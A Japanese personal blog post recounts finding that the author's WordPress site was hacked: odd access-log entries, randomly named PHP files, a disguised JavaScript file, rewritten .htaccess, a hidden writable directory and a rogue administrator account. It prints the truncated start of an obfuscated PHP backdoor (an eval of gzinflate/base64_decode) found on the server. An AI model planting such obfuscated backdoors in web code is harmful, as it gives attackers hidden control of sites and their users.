ハッキング被害というのを甘く見ていました。自分には関係ないだろうと高をくくっていたのですが、ハッキング対応が甘かったせいで被害を被ってしまいました。
まあ、被害といっても個人的なことを書いたブログであり、商用で使っていたわけではないので大したことではないんですけどね、、
ただ、ハッキング被害を実際に受けてしまった、ということにショックを受けました。
ハッキング被害発覚の経緯
最近ブログ更新をサボっていたこともあり、広告収入が激減していました。
どれくらいアクセスがあるのかを調べようとWebサーバーのアクセスログを調べ始めたところ、たまたまハッキング箇所が目に留まったのです。
アクセスログにはリクエストのあったブログURLが記録されているのですが、見覚えのないPHPファイルが呼ばれいていたり、長いURLがあったりと、どう見てもおかしいと思えるログがところどころに見受けられる、、、
「ハッキングされている・・・」
Webサーバーはアクセスログとは別にエラーログというのも別に出力するのですが、そちらにも何やら訳の分からないエラーが多く記録されていました。
このようなログを見てハッキングされていることは間違いないと徐々に自覚していきました。
ただ、ハッキングされたからといって、一体どんな被害を受けているのか?ということも分かりません。。というのも、ブログを見ても何も変わった様子がなかったからです。
変化があったとすれば、広告収入が減ったことと、アクセス数が減ったこと。
けれども、これはハッキング被害が原因ではなく、ただ単にブログを飽きられて誰も見に来なくなっただけかもしれないのです。ハッキングで何をされているのかがさっぱりわからない。なので、どんな対応が必要なのかも当然わからない。
実害がないからそのままにしておこうかとも一瞬思いましたが、ハッキングを放置するのも何だか気持ち悪いので、とりあえず分からないながらも調査することにしました。
ハッキング調査してわかったこと
まずは、サーバーのブログ公開のディレクトリ以下に変わったことがないかを調べていきました。するとすぐに異変に気付きました。
違和感を感じさせるファイル名があったのです。文字の羅列に数字が付加されていたりして、直観的に変だと感じさせられるファイル名なのです。
- i435z.php
- hes6k.php
- bqjkf.php
ディレクトリを徐々に深堀りしていくと、やっぱりあるのです。様々な階層にハッキングの形跡を確認できました。
また、ブログの仮想ディレクトリ名を使った紛らわしいものもありました。
- blogname_zxcvbn.min.js
それで次に、怪しいファイルの内容を確認すると・・・・、すさまじい文字の羅列・・・・。これはどう考えてもワードプレスのファイルではないと思いました。
|
1 2 3 4 5 |
# cat 1vhse.php <?php eval(gzinflate(base64_decode('DZfFrsUKrkQ/p+9VBmHSUw/CzLCTTFphZs7XvzP0rKxyLdvllQ7/1F87VUN6lP9k6V4S2P+KMp+L8p//iEki7nug7L0VQXDU1MnUdtRn5BJsW/tnkGYEwt+lDAoWaCsNAVoFIGufQqtNqdCF9jsP/HAfj1QfBJX8qtgx5UttnsGZbXZg08PChDGEfsOuBaqxTowx4swiNIRB8TQ2j8DEWR8K03gQm6/TGzp4A7JXgyzwQf3v5t0yaJ84W1RFkf3nUKe5U4R1145C6ns0fJK3c9VXSWZgCQYtYDlMOUWdFnU8t8uMJCMEOeT5pZGR1NfQR9pDNSZWe2f8mN6goFP5fp5HqGi4FWO3IhRqNhhRlN629bEaHsNWdGD4K+vf3DAV4K23xXECPTBmdKkyAzZ98qj1b7Ro343yp/giBX4nnP9i8DHf340n9mI4z1dz6u51S2CjmvkBZkNnF0X09AicaASkPT+eIudEuPMWssUy8grL5QZD6MDu0YikMjmyJ45KeFmVXy64OYyNXBUWaTYykvvdm53sjMboa9JY9NIjXiA1dHVXiCygxI8fKwU9L1Fh7IrjraU+Wo4OgiV9w51MoVP92etvxruyROW2xMEyrtYk44Yxa+rfjrW+EgI5H5u2HV2cLvsgmcTxoC/oVXACej4e0TmOtjn0qlGujmL+T9KQNodunZ/1Sp31QratgZCmjLyDebjqQibY2Kc15J0JsFsL+kzxJSBo5XkKr0+Wv3kQOzURjGR16N+lu7C9OzWVe8kZM5/TEktAWjvYdR4azSE3Eat/z8XDL19dZQTl+55PrG2uMQrAFfm7s+EGmSMjax1Wgtv5hgEw1AfJeZp4giuAjCB8wNXpKoqg58gMDa2+YGgW7gau642zD74VtqcACskWmURi2WjbD3/zNdR2Cy3NapUKHyYT+Hvky8vDsFyjxEclXzS8OyvAmjLrVOl4+U0qXX1cQa5sUnQH0bp2kxca9Qa20zvHld9sZz7ytfYQdpA5oe5W3ZMKVgV6vdWg4lTKgfXgdAGxdqRctcmSBGHErdQsOUvz3g53lYBg4g7BAZlzt9/hJR2YLSbavgPlWUpN/03TCgAqCoQQCBRQsuooZCiWwBCWUMona1YFu+BWPy8keYUOKDEsS+V15I8ClwHhb5TewV7PRSzYjXGclxuThpxntyxcxVPInttJIENhvcHU2m/Tu548 <以下省略> |
最終的に判明したハッキングの実態
このような感じでワードプレス関係のファイル、データベース、プラグイン、アパッチファイルを手探りで調べていった結果、ハッキングの実態がだんだんとわかってきました。
今回の調べで分かったのは以下の内容です。
- ハッキング用のPHPファイルが置かれている
- ハッキング用のJavaScriptファイルが置かれている
- .htaccess が新たに置かれている
- 既存の .htaccess も書き換えられている
- フル権限でかつ隠しディレクトリが作成されている(第三者が書き込みできる状態)
- ハッキングスクリプト配置用のディレクトリが作られている
- ワードプレスのユーザーで作った覚えのない管理者ユーザーが作成されている
- ワードプレス用データベースにテーブルを追加されている
こんな感じで、それはもうボコボコにやられていたわけです。
我ながら、よくもまぁーこれだけ荒らされるまで気が付かなかったなー、っと呆れてしまいました。。。
「元通りに復旧できるのだろうか、、、」
そんな不安が頭をよぎりましたが、数日かけてなんとか復旧することができました。
復旧作業をやりながら、
なぜセキュリティを突破されたのか?
セキュリティを強化するにはどうすればいいのか?
という対策も同時に行っていきました。
その内容を具体的に詳しくまとめてみましたので、よかったら参考程度に見てみてください。
対応後は、アクセスログやエラーログに変なログが記録されるこもなくなり、今のところハッキング被害も確認されていない状況です。
効果はあったのだろうと自分では判断してますが、今後は放置せずたまに正常性の確認なんかもやっていこうと思ってます。
その確認するスクリプトも作っているので、記事を書き終え次第アップします。
